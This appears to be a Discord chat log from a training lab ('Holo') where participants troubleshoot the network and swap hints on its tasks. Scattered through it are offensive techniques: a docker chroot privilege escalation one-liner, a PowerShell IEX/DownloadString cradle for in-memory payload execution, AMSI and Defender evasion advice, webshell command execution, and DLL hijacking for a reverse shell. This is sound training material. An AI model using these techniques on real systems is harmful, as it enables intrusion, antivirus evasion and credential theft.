#holo-network

dropping all the way back down to 10.200.69.0/24 seems highly unusual

Interesting...

Holo released??

my suggestion is this:

• Leave the network
• Rejoin
• Regen VPN pack

Ok

After rejoining...

can you access .33 via web?

there should be a wordpress instance running

No.

worth noting it would be on http and not https

I wonder if that subnet is just dead :/

@chrome cave know any way to force a user onto a new network subnet?

I have also not specified HTTPS.

No -- it's done by available spaces unfortunately 😦

reeeeee

Skidy can shift people manually though

@bright stirrup build network tools reee

@frigid nacelle do you happen to have access to the 10.200.69.0/24 network still? if so could you check and see if it's possible to access .33?

I just opened a random task (Thanks, I’ll let myself in.) and found a very small typo in the JavaScript, it says in the code block “document.getElementbyID” the D should be lowercase and the b should be uppercase, otherwise it wouldn’t work in JavaScript

In the screenshot below it’s correct but in the code block it a small typo

@bright stirrup please build network tools reeeeee

@lone spruce ^^ that one is your dept

harass horsie on Snapchat ezpz

Lmao

Im not assigned to that task currently

Sorry homies

TAKE INITIATIVE HORSIE

GET IT DONE

Interesting here.

@wind bobcat should I give Cry manage messages in here?

Or nahhhhhh 😆

nah

@chrome cave mhhh there are only two people that can tell me that

Otherwise u can be pretty sure I wont do it just for the sake of being an ass

I mean, one of them promised me a network console 🤷‍♂️

And I'm busy racing other bicycles in Paris

Sucks to be you ig kekw

Anyway, im out, gl hf, love you all

Wait

This channel is no longer a meme

Dw it still is

Get back here you lazy shark-headed, equine sod! 🤣

Lmao

Ok

Lets play a game

Network console!

If you give me the name of the monument i posted

Ill think about doing something about it

You have until 05'

It's easy.

I found it

Thanks Fawaz. I hate Geolocation

You've been found french boy

Give us the money

Yeah I am still in the 69 subnet. Let me check from the AttackBox.

.33 is down.

Fawaz wasnt a player in this tho

You gave a challenge right in front of me and expect me not to win? sheesh

thanks for confirming. I wonder if when Ashu had us clone the boxes last, they may have removed the instances attached to the test network

Gave +1 Rep to @frigid nacelle

I guess we wait for Skidy or Ashu

I could perhaps assist with that. I code monkey for a living

@west sail fix thm bot

Kek

which part?

All parts

Jkjk

Just messing

I did actually write some bot code I need to test/push/PR

I am.. as one would say.. horsin around

got sidetracked and forgot

Aye dope

but yeah, in all seriousness, I'd be willing to help with code stuffs

Cool cool! I have a few projects for the bot, I might contact you about it when it'll be in motion

cool. Yeah, I saw you'd posted something about a total rewrite, so i sorta stopped what I was working on and then forgot cuz I'm a knucklehead

So I could possibly do the network soon or what does that look like?

we need to wait for a thm admin to be available to assist

Okay.

Yay holo is up!

Is it?

Maybe? It asks for sub

yep, it's a sub only network

Ok cool

Holy shit

I go to work for the night and I come back to everyone realizing Holo is a thing

Christmas in July! 🥳

I’m going to bed don’t break anything too badly

too late

it was already broken dad

Holo is now cancel.

Thanks for playing.

Wait why

because why not

👀

If you find typos in holo where is the place to report them? :)

I got a DM from a remember I don't know, with a pretty suspicious link. Who and where do I report him to?

@chrome cave I think you dealt with something like this just now

Gimme name

sven1988#1781

@zenith delta

Done

It's stupid that they think it's actually going to work especially in a community like this

Anyway, thank you my people. Have a good day

network is down

can't even ping the machines after the boot and there are not enough votes to reset it

if you guys are having issues, would you mind leaving the room and re-joining it? 🙂

it works, thanks 🙂

Do the networks give points?

Looking forward to starting this! 🙂

In this channel. 🙂

Holo and Wreath, yes. Throwback, no (as it is a separate premium network). 🙂

Okay cool 🙂

Thanks

I found one small typo in task 5, the "are are"

In task 8, are we looking for subdomains in vhost scanning or FQDN's ?

What are the two other domains present on the web server? Format: Alphabetical Order

Look at the http title on the machine then fuzz that domain, it's FQDNs not IPs

i got ton of subdomains, added primary domain in hosts file and then scanning on that

Yes I just worked that out myself as got a bit confused

is it ok If i dm you ? @stable dune

Sure

thanks 🙂

how old is holo network, i can't ping any machine even after reset

tried leaving room and joining back

Which machine are you trying to ping?

L-SRV01

i see you have throwback tag on you, is that network stable if i buy that ?

Throwback is a complete different network and yea it was pretty stable when I did it

is holo new btw ?

Yep

But it’s only soft-released as it still hasn’t been fully tested as few other testers haven’t completed it

that's why maybe

got it

even when i am trying to find vhost, webserver goes in filtered stage and drop every web request

You may have multiple vpns running

Type ip addr and see if you have more tun addresses than you should

neah just one, tried even attackbox

in my local just had one tun0

Hmm not sure then I would check to see if I could ping it but i’m out atm

But it should ping

now i can ping, it's really unstable

cc: @clear zephyr

cc: @outer junco

Hi there, would you mind leaving and rejoining the room please?

typo error : its GRUNT , T is outside of the italics.

task 25

tried that, but still had issues

Have you regenerated your OpenVPN config file?

Are you on a new network (does the network map show an IP with a different third octet?)

now i'm connecting through attackbox

and again it failed

are you connected on both the VPN on your machine, and the AttackBox?

You can't have both running at the same time.

nope

I'm actually on that instance right now and everything seems to be fine

If you left and joined the room, you'll need to terminate the AttackBox and then restart it:)

got it :), will try that

This isn't a big issue, but in task 8, there's a sentence that says "We can utilize Gobuster again to identify potential vhosts present on a web server." But, gobuster and wfuzz aren't introduced until task 9. I just thought I missed something from the previous task based on the verbiage.

oh, that was just me reordering tasks and breaking them up

didnt realize that was in there still

@wind bobcat you cant hide from me by just changing your name. fix it fix it fix it

I'm sleeping

Pretty sure I’ve pinged you a good 10 times today alone. gl trying to find them all

Is there supposed to be an alpine image on the webserver or do I have to upload it myself? I can't seem to get the SUID privesc to work. (Task 19)

you shouldn't need to upload an image for the suid exploit to work -- check out the gtfobins suid
https://gtfobins.github.io/gtfobins/docker/

wait a sec

they changed it

smh

Rip

if you run a docker images you should see all the images installed on L-SRV01

you can replace alpine with one of those

this should work:
||docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt sh||

Thanks! I thought I might have to do something like that but I just wanted to double check.

So they recommend a Windows VM for developing .NET. But this expires soon. Is the recommended way actually getting a license for a developing Windows VM?

If that is the case, I think I will just install Visual Studio in my Windows host ...

personally, I use VS Studio on my host

but you can extend the trial w/ slmgr /rearm

👍

I don't think I'd personally ever buy a license for deving stuff unless my employer is paying for it

but you can find keys that aren't volume license that are cheap that are completely fine

https://youtu.be/bm3mLBJWBhc

so soft release? 👀

yessir

aah ill finish soon

You were too busy posting cat pictures 😄

That's important work.....

Having trouble using gobuster to look for vhosts. Every time I run it I get a timeout error. I have event waited for a network reset. Can anyone help? My hosts file points to holo.live with my 10.200.x.33 IP

OMG HOLO IS RELEASED

try -u http://holo.live and add a timeout flag: --timeout 20s

That’s what they want you to think 👀

is ping disabled in the machines?
cause nor the .30 or the .33 responding to pings

tried rejoining the room

and regenerated a new vpn file

just remembered its a Windows environment

but nmap still wont work with the -Pn

iirc 30 won't respond to pings since it is in the "internal" side of the network, not sure about 33, should work fine i think

Thank you, that was it.

Gave +1 Rep to @wind bobcat

In task 9 what is fuzz: what exactly is the question (What file loads images for the development domain?)

I on dev domain, am i looking for a image file or a php file which contains it ?

this is only subtask i'm left with in task9, can't get the question

ok

got it, thanks 🙂

I think I am missing a flag. Under Task 14 the last question is Submit the flag on L-SRV02, but as far as I have seen nothing in that task has lead to a flag. Am I missing a step? I have looked in the .dockerenv file and under /proc/1.

Have you looked for a user flag

I have not. I will give that a try.

Thanks, I am stupid, I even saw that when I got into the server, but I did not pay attention to it. Thanks again.

Gave +1 Rep to @lone spruce

.33 is the only machine you should be able to access - if you cant, reset

I knew someone would mention holo here

hey , I need help in Task18 , I followed the exact same steps but unable to get reverse shell

can you execute individual commands?

yes

I would try downloading a Meterpreter reverse shell into /tmp/ and trying to execute it

you may have better luck with that

thanks , I got the reverse shell 🙂

yeah that is a bit of an advanced way to get a shell

def easier work arounds but its a cool thing to show off

yes

Is the network down? I could fuzz subdomains but now while trying to do directories gobuster keeps giving me a “unable to connect to…… “ “ client timeout exceeded while waiting headers

Have checked access and I’m connected to holo through VPN

(Otherwise I wouldn’t have gotten the subdomains lol)

Have tried increasing the timeout, still unable to connect ☹️

so it finally released? publically

does this count as a fanart submission?

etc/apache2/ports.conf

this file right?

php -S 127.0.0.1:yourport
is a much better alternative imo

it should do the same

al thanks

Gave +1 Rep to @wind bobcat

i took 6 month subsccription in december because of holo. But it got released now and i dont have subscription 😫

holo is cancelled

how am i supposed to know via this method?
i got the param via the source code, but want to try out the same method using wfuzz

so FUZZ=ls+-la should have a longer word/char/line length

because it's the whole html webpage plus the contents of ls -la

HOLOHOLOHOLO

ITSRELEASEDDDDD

can we do holo on attackbox

or is it too hard

i think you could but it might be a hassle deeper into the network if you're not working on your own machine

Ok, thanks. It's just because i dont have my own pc

to run a vm on

so i use attackbox 🙂

I mean you can

youll just have to set some other things up deeper into the network

btw, whats with all the vargs

I don't know and at this point I'm too afraid to ask

lol

guys one question. if i am in the room now but in few days my subscription will end

so with sub the room does too?

we don't know yet

where's Banana Varg

i did make a custom wordlist with the ONLY word as cmd it showed the same chars, ill try that again today

thanks )

When ur sub ends ur access to subscribe only rooms will also end

ik tho i was just confirming for holo

WE GROW STRONGER EACH PASSING DAY!

Can someone confirm if Task 12 (RCE on site) is working?

well guys

i added holo.live to the hosts file but

browsing it shows page not found

but it pings

its weird idk whats happening

can anyone help?

i think its iintended

the other subomains work for m

the site doesnt load after once i get a shell

i mean if i ctrl+c

then it taks years to load

new tab

nothing works for me

:/

this takes uyearsssssssssss

neither admin

the port scanning script

@weak rapids is it working for u

?

Should be www.holo.live with the other subdomains in the hosts file, not just holo.live, if I remember correctly

yea

yes

rigt

oh right thanks

Gave +1 Rep to @cinder notch

Np

for me admin page takes years to load

I think my solution to that when it took forever to load was to fully close my browser and reopen

I don't know why it does that sometimes but fully closing and reopening seemed to work. I don't remember if a hard refresh worked though.

for me its a second

lol

reconnect to

the vpn maybe

tried all that

oh will try thanks

Gave +1 Rep to @cinder notch

Is it supposed to display a page when logging in, because I don't get that 🤔

how am i suposed to find the IP address of tyhe machine withut looking at the graph?

docker

Nmap?
Docker is also usually in a certain subnet (not the case here)

the subnet wont resong to ping scans rigt

I am guessing you are doing it through a proxy, in which case; make sure you are doing a handshake

figureed it out lol

i had to use the ip of the machine insteda of loca host

It must be broken or something 🤔

any hints on task12 rce, i tried it on img? to fuzz but not sure if that's right. Stuck on it from 2 days

i tried intercepting the request in burp as well tried whoami but that didn't work

waaaaa

network just restarted, can anyone access the admin subdomain? am not able to

been 15 min since boot

am only able to view the .33/robots.txt

the domains dont work

same am also not able to access

it doesn't exist because it's not on the same server lol

and as for not being able to access it, I honestly can't provide any other advice other than reboot?

Or just change the file name?

it says the error right there

hello. the admin site login doesnt seem to work. responds with valid then redirects to the dashboard, but doesnt set a cookie or anything

any request to the dashboard just redirects back to login

this would be task 12 - i guessed the answers but cant confirm them alas (ideally I shouldn't have just guessed them)

also should note that the command to unzip the test site is not quite correct - doesnt put the unzipped files in the right place. trivial to fix thouggh

tried resetting, my frnd also had the same issue. he gets x/19 and i get 2/3 votes is it this different for every1?

i think i did try that, thanks will try again after a reset

Gave +1 Rep to @lone spruce

The reset vote requirement varies between the subnets you get dropped into, more people on one = more votes required

oo okay thanks for clarification

Gave +1 Rep to @river cradle

well, yesterday i connected to vpn but

the request was not completing

i mean it was not reaching the website or even the ip

but it worked some hours before

anyone who can help me with this part

@haughty jacinth this message is relevant

it worked , previously I tried with only "ubuntu" forgot to mention the version / TAG

It doesn't work for me either
any nudges please!!

it does

Hey everyone, a quick question: for those of with shitty PCs, what's the recommeded way to compile C# for the tasks?

i mean do it with some online compiler

checkout https://replit.com

it could work

ig

I have a shitty 4GB i3 wit some 1TB HDD 🤡

Thanks man.

Gave +1 Rep to @livid shoal

Hey, did anyone managed to get root on S-SRV02? I've got root on the DC, but when I tried to connect to S-SRV02, all I ever get is STATUS_TRUSTED_RELATIONSHIP_FAILURE

woah u completed it

almost

Hey, is the port 80 of L-SRV01 open? All my Nmap scans show it's closed

I'll take a look at it later tonight. We had some issues with it failing towards the end of testing. I'm not sure what's wrong with it, I might need to rebuild it

what network are you on, I might be able to do a hotfix for you?

Thanks! I am on the 10.200.69.0/24 one, if that's what you mean

mother-
@frigid nacelle would you be willing to toss me over your VPN pack by chance?

If you need one for 200.69 i can send you mine

@river cradle yes plz bb

ah oka

i'll need to fix this box in dev

the reason it's dying is because of lack of memory

attempted to RDP in 2x and it died both times

1 time it straight up couldn't handle the logon process

2 time it was able to handle it and couldn't start powershell

after attempting to start powershell, it ided

how do i get started with holo? im connected to the VPN but no traffic leaves my thorugh the vpn interface tun0 - i checked with tcpdump. not sure whats going on...

i tried scanning the 10.200 range and the 192.168.100.0 range

ok regenrated my vpn and it seems to be working onw

Hello! I'm a bit confused about how to perform Task 17. This what I'm being told meanwhile. Could someone clarify?

You’re running it on the correct machine right?

@wind bobcat

yes. on 192.168.100.1

I didn’t set that one up or look over the instructions for a while but I believe there are two different SQL servers on it? Make sure you’re accessing the right one

oh alright. thanks. let me check.

Gave +1 Rep to @lone spruce

Is there any chance for a reset on the network please the initial web server has crashed. 10.200.106

this should be the right one

worked for me

also

a doubt for amsi bypass

we need to spin a windows vm?

locally

it’s recommended you do

you don’t need to

ah okok

The network only seems to allow for 10 gobuster threads. Is this because other people are on the machines too?

Or is there a network issue!

likely too many people per subnet

honestly, I bet that's what's taking the web server down

I did run ferox buster against it and that’s when it crashed. It’s ok now as the network went to sleep.

I’m running gobuster with 5 threads right now. It’s slow on the main VHOST but on the others it runs with fairly decent speed on 5 threads

Running all consecutively (although I wasn’t to begin with)

I've just added a note on the WFuzz/GoBuster tasks requesting users to decrease the thread count

Okayyy amazing. Thankyou

It kept erroring out

I thought so. Worst case, I'll have Skidy bump the resources

As a tip could you include adding | tee gobuster-vhostname.out to their command? It clears all the error messages and gives you nice output

May be handy and prevent you getting called upon often

@wind bobcat can you check host 10.200.69.33, none of the web resources are running on it

if the webserver is dying from everyone hammering it with request i can't imagine what things pc-filesrv01 will have to go through when everyone starts doing their part on it

Yeah please reset the network of something. I guess we need two more votes. Can't even get started on the network.

if you're asking people for resets, mentioning the subnet you're on would be 👌 since there are separate reset counts for each one

Oh sorry. I'm on the 10.200.114.33 one and the port 80 is closed

;___;

Task6 complier with the windows virtual machine

Is that gonna be a blocker if i don't setup a vm for windows?

Or I can just skip it to continue the rest

you know, I think I might know another reason as to why the web server might crash - a user could also be stopping it

which is no bueno

I'll make sure to add that in the tasks

since it's running in a docker container, it's easy enough to kill..

I mean it’s not necessarily going to block you but I also don’t suggest skipping it. It wouldn’t be in there if it weren’t critical to the rest of the network

gotcha, thank you

Gave +1 Rep to @lone spruce

woah i had 40

lol

my network is kinda stable

will an azure windows 1gb ram vm serve the purpose too?

Hello . I just started the Holo lab and when I use nmap command the result is 0 hosts up , but the network state is running 🤔

It's probably because the initial servers are down

What's your subnet?

You might request a reset

Which reminds me, people in 114 subnet?

are there different numbers of people in different subnets?

Might be

I can't even get started tbh

how many votes are required for your subnet?

any problems? or just didnt start ?

I need to more

Well the initial webserver won't start

Like there are supposed to be 3 open ports

And I'm getting only 2

Port 80 is closed

😦

ah maybe some problem with 114 then

115 is stable

Yeah a lotta people who are starting the network now are facing the same issue

how many votes are required in your subnet?

btw

2 more

aahhh same iirc one person had 19 in it

which ones are open?

22, 33060 I guess

woahh strange

Exactly

I thing someone terminated the web server or something

yea some exceptions maybe :( you need a reset

Yeah 😦

tho in meantime u can have a windows vm ready. you'll require it ahead if you already dont have one

I have a shitty PC but I got a Windows 7 VM with VS all booted up

woah nice

but but

you need windows 10 ig

Windows 10? My PC will die

lol my pc died too so i spun one in the azure cloud

I have a Windows10 VM on a Ventoy-USB if that helps

How much does Azure charge?

it was free for me ( education plan )

How do I avail that?

two small 1gb ram vms ( one windows and one linux ) always free till u a student

github student pack

no credit card required :)

NOICE

Gotta apply for that

yea its awesome

Thanks man

welcome :)

Same here, I know (from the task description) it should be there but it isn't

hey support, it is not cool if the service crashes and you have to wait for 17 more votes before a reset.... at least make sure the service restarts itself...

yeah i get it, i don't think it was supposed to end up with this many people on one subnet
while i'm not support i can try to apply a temp fix on 10.200.69.X while reset votes are still gathering

:80 and internal http should be up, still need a bit to get the other mysql running

sheesh your subnet got 19 people?

Hi Szy, it is working now, thanks !!

Gave +1 Rep to @river cradle

Not sure, at least I needed 17 more votes for a reset... but @river cradle fixed it

woahhhh thats insane

mine got 3

for some weird reason a bunch of people were dropped into the testing subnet

oops

but yeah the foothold should be working fine now on .200.69.X, if it breaks again i can probably try to fix it again if spooky/cry aren't available

👀 anyone knows why its happening.
the machine is windows server 2016 datacenter
and rtp is enabled i checked it

tried turning the vm off and on? 😄

well yeah i restarted it. its deployed on azure

ok now it

works

weird

thanks anyways

machines do be weird sometimes

you sometimes just need to give them a (virtual) kick to get them running

😮

guys can anyone help me. i am really struggling with this part. the amsi bypass is kinda new and advanced for me :( no matter what i do it always gets detected :(

tried changing the variable names to some random stuff?

still.... 🥲

Did you follow the bit about type acceleration. That’s all you need

oh sheesh 😅 i thought it was optional

lemme go see it again

done thanks

Can anybdy try to run masscan on their respective Holo 10.200.x.0 subnet and show me what they get ?

The Linux serv is fine and works for me, but for some strange reason masscan finds jack shite

segmentation. that's why lol

and the .x. is something you should be providing, it's important we know which network you're in for solving any potential issues

https://prnt.sc/19qvl4r

There is, ofc, a non-zero chance that's this is just me being an idiot.

I'm not too familiar with the tool

that many packets per second is incredibly high

there's only 6 hosts in the whole subnet, that's the rate you'd use if you were trying to scan the whole internet lol

by default masscan runs at 1,000pps, you've upped it all the way to 100,000pps

A very fair point ; lowering the rate doesn't seem to change anything so far

it wouldn't surprise me if the web server crashed or just completely missed it all together

if you can access 80 on .33, then it's still alive, but if not, the server probably crashed

It's still alive, I keep an eye on it after each scan

(I also thought I'd crashed it, doesn't seem so thankfully)

does nmap produce the same results?

Nmap works fine.

which is why I find this weird

I wonder if masscans timeout is lower than nmaps is

you could try the --wait 30 flag

nope, nothing

Beh, I'll just give up. Shame.

still pending fix, if you DM me your THM username, I can verify that you've submitted the DC flag and give you the S-SRV02 flag

I'm stuck on task 17 Docker Breakout, i can access the DB but when i use one liner to create the php file from sql i can create it in www/html/ but when i try to access it with curl 127.0.0.1:8080/shell.php it just fails and if i use the ip address of linux machine then i get same www-data user in output.

if i try to do it again, there is file though. Tried changing file names but behaviour is same.

you'll get the same user because you're running in the context of the same user -- www-data

you're not doing anything wrong

commands are being executed on the internal web server as www-data

i logged in as admin under mysql

but then how i'm supposed to to priv esc as root

once you receive a reverse shell on 192.168.100.1 (10.200.x.33) you'll need to preform basic enumeration to elevate privileges.

i found active ports, i'm just going by tasks. So right now main point is task 17 what i can do here ?

yes -- task 17 going into 18.

and privilege escalation on L-SRV01 (not the docker container) is outlined in task 19

but on task 18 i'm supposed to have a rce on the host which i don't have

can you help me just a bit, if you can join vc ?

you do have RCE on the host

you're just slightly confused because the commands are being executed as the same user

if you run a different command, for example, hostname

you'll see vastly different results

6c57bcbfa147 it looks like a container id

if i do hostname

Yep, so if you do:
curl http://192.168.100.1:8080/shell.php?cmd=hostname

you should see different results

yup

exactly -- so you're executing commands on a different host, not the container

got it

your next step is to get a reverse shell (outlined in task 18) and after you do that, you can proceed on to elevating privileges on task 19

thanks 🙂

any other way to build defendercheck?

without visual studio

yes

can you guide me through it?

https://github.com/Sq00ky/Compiled-Binaries

try that exe in there

thanks alot

getting this error

iirc you might need to specify an executable after it

oh

the arguments for Defender Check are weird

they totally could have done a help page for it ;p

switched to threatcheck

did that end up working? theatcheck is miles better

yeah it did

pog

theatcheck is better, anyways

not because Rasta Mouse built it or anything and we simp for Rasta

lol

@wind bobcat also a question. do i need to use the c2 or i can do it without c2 as well?

for this

one particularly

you can do this without a c2

a side goal of our networks is to teach a C2 framework

or at least get you to try to use one, lol

everything that can be done with a c2 here can be done without

in the future, I'd like to build a network that focuses on Cobalt Strike

wow

👀

excited

I'll need to ping some people in my space to see if we can pull this off

honestly hands down holo is a real great network. you and cry have put some real efforts. thankyou so much 😄

👀 also doesnt cobalt strike costs a fortune for a license ( dk much about their trials )

yessir

Trials it might completely depend

as long as someone at Help Systems hopefully agrees to work with us, it might not cost anything

oh great then

@wind bobcat one last doubt ( hopefully 😅 ) in the room it says .exe. do de we have to convert powershell file to executable one?

summon @lone spruce

Getting a Trust Relationship error when trying to RDP to S-SRV02. I am using domain admin credentials. I think a reset is needed?

that unfortunately is a known issue. We're waiting on THM to get a clean environment spun up for us so we can apply the fix. If you DM me your THM username, I can verify you've submitted the DC flag and give you the S-SRV02 flag

if your name happens to start with M and ends with 0, check your THM PMs

So I just started with the holo network

And in task 8 the Syntax for wfuzz is given as :
wfuzz -u <URL> -w <wordlist> "Host: FUZZ.example.com" --hc <status codes to hide>

Won't it be:
wfuzz -u <URL> -w <wordlist> -H "Host: FUZZ.example.com" --hc <status codes to hide>

yes, I'm going to kill Cryillic

syntax has been updated, thank you for reporting

it should be task 6 shouldnt it be?

What? Where

Mwah

shell.exe

i have a undetectable ps1 file

only

not exe

yet

Umm any mods there? I might have something to report.

spooky is around

Offline

I'll check general

why the timespan is just 10 days for holo

You can join back it's because a lot of people will be joining and so it will free up space on the networks

will our progress remain in network ?

Yep

perfect 🙂

Anyone could help me
I am trying to execute my revshell binary (in local network) but get this error, what stands for?
Listener?

I am trying to execute it with default sourcecode (Executor and Stager) and without defender, anyway this error

wait 👀 u converted ps file into exe?

No, Binary

oh sheesh

my bad 😅 i was looking for it

ok i am way too much confused on how to use covenant

@wind bobcat can i ask some things if u are free?

Unfortunately, Cryillic is in charge of those sections. I'm 7-20 | 44-47

oh okok

depending on the question i might have the answer @livid shoal

szy is resident c2 expert

nah that'd be fawaz probably

maybe for cobalt strike

i only touched the unnamed once, and empire also once during throwback

anywhere else i just used covenant

broke on me multiple times

@wind bobcat which one are you going to use with very advanced attacker labs?

none

RDP Ception baybeeeeeee

yikes

ill be honest, deep network segmentation is unrealistic except in ICS/SCADA networks

👀 so i generated the ps1 amsi bypass payload which is not detected by antivirus. now how do we use that. I mean what i got was
generate a php shell which in turn will download a binary which will open a reverse shell
and then we have to execute the payload we created earlier??

is the sequence right?

but often at times, they'll just be completely airgapped

you can do it like that with the php file giving you a revshell and spawning a covenant grunt from that, or you can try execute the grunt stager directly from that php file (obviously with the amsi bypass embedded)
both of those might result in pretty big files because of how obfuscation works.

what i like to do in labs like this is host the powershell payloads/stagers separately and in the "exploit" just place a snippet that triggers it's load
usually it looks like this: I slap the amsi bypassing portion in the first part of the file and right below it just copy the powershell stager, optionally obfuscate that, host that on a webserver (you can use the one embedded in covenant) and invoke it from the exploit/whatever using IEX(New-Object Net.WebClient).DownloadString('http://yourip/file.ps1')

oh so no need to create a binary? just a normal powershell file will work with amsi bypass in the first half and stager in the last? and downloading that from a php shell?

you can take multiple approaches, you can also make a binary, download it and run from the php file
there's no single correct way to do this

ah and also if i included the stager code in the end, it wont get detected by the defender?

from what i understand if you don't place it on the disk then it will only go through amsi

ok thanks lemme try

lmk how it goes

so we figured out what is up with .69

there happened to be 145 users in that one network

😄

It's a party.

lmfao how

autoscaling go brrr

you know what time it is?

autoscaling broken hors pls fix

@bright stirrup holo broke plz fix

yeah its broken

which part

and what subnet

i cant access the dc webserver

there is no dc webserver

the only webservers are s-srv01, l-srv01 (technically l-srv02)

sorry its accessible

yeah

Task 30 -- Dead link

yea ^

ill try it today. i slept last night. one more thing do i need to proxychains the c2? I mean how would it reach to me? or just running chisel on client and server side makes the job done?

there's only network filtering inbound, not out

so as long as an internal machine initiates the conversation, it should be fine

ah alright thanks

-undelete 1

Up to 10 last deleted messages (last hour or 12 hours for premium):

none...

nopes no success with this one. https://gist.github.com/mananchawla2005/737db1d2f0b0783ac7ad99a534771fff thats my php script which downloads the file names gg.ps1 from http server setup on my machine ( the file is being downloaded it is shown in the logs) . So as we discussed i added the stager code generated by c2 after amsi bypass code like this -> https://gist.github.com/mananchawla2005/b82be3800460adf750cee5c134f17e83 but the file was requested but no grunt was being created. Then i tried replacing the stager code with normal reverse shell payload https://gist.github.com/mananchawla2005/d395b66cc65fe21db8814838f25d3725 but still no shell?
Am i doing something wrong? also i added the proxy in my browser to access the webpage so i can access either the website or the c2 not both at same time. any workaround for this?

U scared me, I was like "Why on earth am I pinged in holo oh god "

In task 22, dugging a tunnel - we don't have access to windows server if we have to download chisel there and sshutlle, we already have 2 linux machines down. I'm already on L-SRV01. I think I'm supposed to get control of DC-SRV01 but what's the point of chisel then

I'm confused in it

we do have access to windows server there

its in the network

can we rdp that server

if we get a shell there do some priv sec bypass av, yes why not lol

can't even ping windows network

ping 10.200.x.31

any responses?

I'm on linux machine

port 80 is open for that

and now for chisel i'm supposed to have access on DC-SRV01

or we are accessing some service of DC-SRV01 on L-SRV01 ?

nopes. chisel is just creating a proxy so that the networks which are accessible by the linux machine are accessible by us also

its just in network

anyone else notice that a scheduled task is missing on PC-FILESRV01? or is it just me

anyone facing any problem with dirsearch while fuzzing, Im using default 30 threads still the fuzzing freezes after a while

I can't find any internal port open in l-srv01

What version are you using? Is the server still alive? Network connection no problem?

No problem with network connection. I just cant fuzz the server i tried gobuster and wfuzz too

No tool works?

Kinda I mean when I tried dirsearch it started off good but after a while the request count came down to like 5 and it froze

It happened every time i tried

Can you fuzz with gobuster or wfuzz?

@vestal furnace I believe you are using an old version of dirsearch

Im using dirsearch v0.4.1

I released v0.4.2

Will update it rigt away

Hi, can someone take a look at PC-FILESRV01 on subnet 10.200.111.0/24, I dont think its behaving properly based on the instructions.

what happened?

@livid shoal well, for one i cant access it with winrm as per the instructions, but no problem accessing via RDP, then the dll injection is not running because the scheduled task is missing, unless im just stupid, which is probably the case

same even i cant access it via winrm

😶‍🌫️

crackmapexec shows valid hash but

evilwinrm says

authorisation

denied

something like that with u too?

@livid shoal yeah, the user doesnt have the permissions, but you can access it with RDP

woah lemme try that

through proxychains

wha-

someone using

printmare

on rdp

seriously? 🤦

ok

thats one way to do it?

printmare is the latest exploit

not the intended way for the network

bruh

because its mutli user, you probably just cut someone else off mid session

lol

ikr

😂

leave them a nice message and disconnect

seems like the intended way is broken anyway

many have done it already

let me try

if my subnet

is good or not

or, I just dont understand it properly

which is what im trying to figure out

also did u got covenant working?

i did the raw way

i mean simple reverse shell

for PC-SRV01

?

i just made a php script that fetched a non detected nc.exe and created a revshell

the intended way is too complicated

naah its fine but for some reason it was being detected by defender everytime

i just used a simple rev shell payload

and put it at the end of

amsi bypass

and then just executed the powershell file

this is another way to do it

then i did Add-MPPreference -ExclusionPath "path" so i could run mimikatz

ah i just disabled the antivirus

lmao

or IEX(New-Object Net.WebClient).DownloadString('http://10.x.x.x:3333/mimikatz.exe') should also work with amsi disabled

it just directly executes from stdout

nice

so straight into memory?

yes

nice, ill have to remember that one

thats why i was able to execute the ps1 file and get a rev shell
the first part had amsi bypass and appended it with rev shell code so simple it doesnt get detected

szy told about this trick

😄

here he is

That won't work with exes

oops

oh

Invoke expression / IEX is like eval for powershell

yeah, downloadstring kind of makes it sound like it needs a string

To run mimikatz from memory you'd need a wrapper script which in turn can be powershell

so base64 encode it?

I have one like that in my collection

how do you decode into memory?

Base64,gzip,xor you name it

SO depending on the binary type you might have different methods

For c# ones you might just only need to load their classes and invoke straight from powershell

szy also one doubt. when i placed the covenant generated stager it was being detected by defender and not executed but when i placed a simple rev shell script it gave me a shell?

any idea why it was happening? i had to stick to a netcat shell

For normal binaries you might need to load them into memory and execute them, the way the script i have is doing it is using reflective pe injection

Hm, how were you placing the stager code?

https://gist.github.com/mananchawla2005/b82be3800460adf750cee5c134f17e83

that was executed remotely with iex?

yea https://gist.github.com/mananchawla2005/737db1d2f0b0783ac7ad99a534771fff

I don't think it should do that but it is possible i was wrong and defender does scan it too

@river cradle can i dm you?

yea thats what i thought but but when i got the reverse shell i disabled real time protection and amsi and again tried to execute the binary generated by covenant ... still no shell it executes and finishes with no output its weird idk why

Sure

Hi everyone! When the access days are over, is it possible to re-enter the hall?

Yep

You’re able to join back

ad module is not present

:(

is that a bug?

for anyone having the same issue

can follow the steps here https://github.com/samratashok/ADModule

@nocturne pulsar did u find the dll

@livid shoal yeah, im an idiot

i figured it out though

can you give an idea where to look for it 😅 i am still not able to find which is the vulnerable application

in the get-scheduledtask ig?

right?

look in task manager

ohhh

there will be something that is running like 30 times

yes lol i wondered

that why

ohh so that is it

Hi, I'm connected to the VPN network Hololive, but I can't ping servers. Somebody can help me plz ?

i was an idiot and made an x64 dll, when it was clear as day that i should have made an x86 one

but wait that isnt the answer

🤔

for the question

task

nvm

got it

i'm stuck on task 23, i've done pivoting. Can't ping the windows server from anywhere actually, neither from linux-1 or attacking machine even though network is up.
and i really don't have any clue where i'm suppose to get a foothold on DC1.

What exactly i'm supposed on task 23

humm

are you sure you're connected to internet ?

You won’t be able to ping the Windows machines

bruhh

AV

then what exactly i've to do on task 23

23? set up the C2
if you mean 22 then you're supposed to set up a pivot to be able to reach the internal network

we cn't ping it, justified with AV. we can't open website on that ad server. How exactly we are supposed to go ahead in network

which server are you trying to reach?

windows

yeah but which one, there are couple

central dc

were u able to run procmon? because for me it says it should be run from admin account

DC-SRV01

DC won't have a webserver, if you want to check if it's available scan 135/445

tried it didn't got any machine up

after the pivot you're supposed to set up the C2 and then you'll be instructed to start working with S-srv01

youre supposed to do that on your own machine, preferably a VM

oops

ok, will try it maybe i am just exhausted

will the file from kaspersky's website be ok to make the malicious dll?

or do i need to download it from the machine itself

use msfvenom

yes but

we need the

original file?

right?

you need that file to figure out what dll's it cant find

yes so can i download a copy from kaspersky's website

?

to view the processes

not sure if its the same

it could be a different version

best to use the one on the machine

do you have a copy? dk how to do that. i just have a rdp

i used scp on the windows machine

you can scp it back to your own machine

you could also stick it somewhere where you can get it with SMB

@nocturne pulsar can i dm u?

yeah

thanks! 😄

Gave +1 Rep to @glacial temple

I placed every possible dll i found but still waiting for shell? am i doing something wrong

what DLLs did you find?

It can be found in pretty much the first result in a decent google search

kavremoverENU.dll it was

still waiting for shell :/

I got shell once in task 12, not getting now.

